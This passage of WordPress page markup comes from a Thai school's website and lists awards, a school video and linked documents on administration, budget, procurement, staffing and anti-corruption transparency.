{\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_8cd9a2-b3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_8cd9a2-b3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"> รางวัล\"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 170px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_ed3ec7-1c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_ed3ec7-1c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รางวัล\"ด้านผลงานวิชาการที่เป็นเลศ\"<img class=\"wp-image-538\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508661855_122233182278202781_1372776762413040353_n.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- 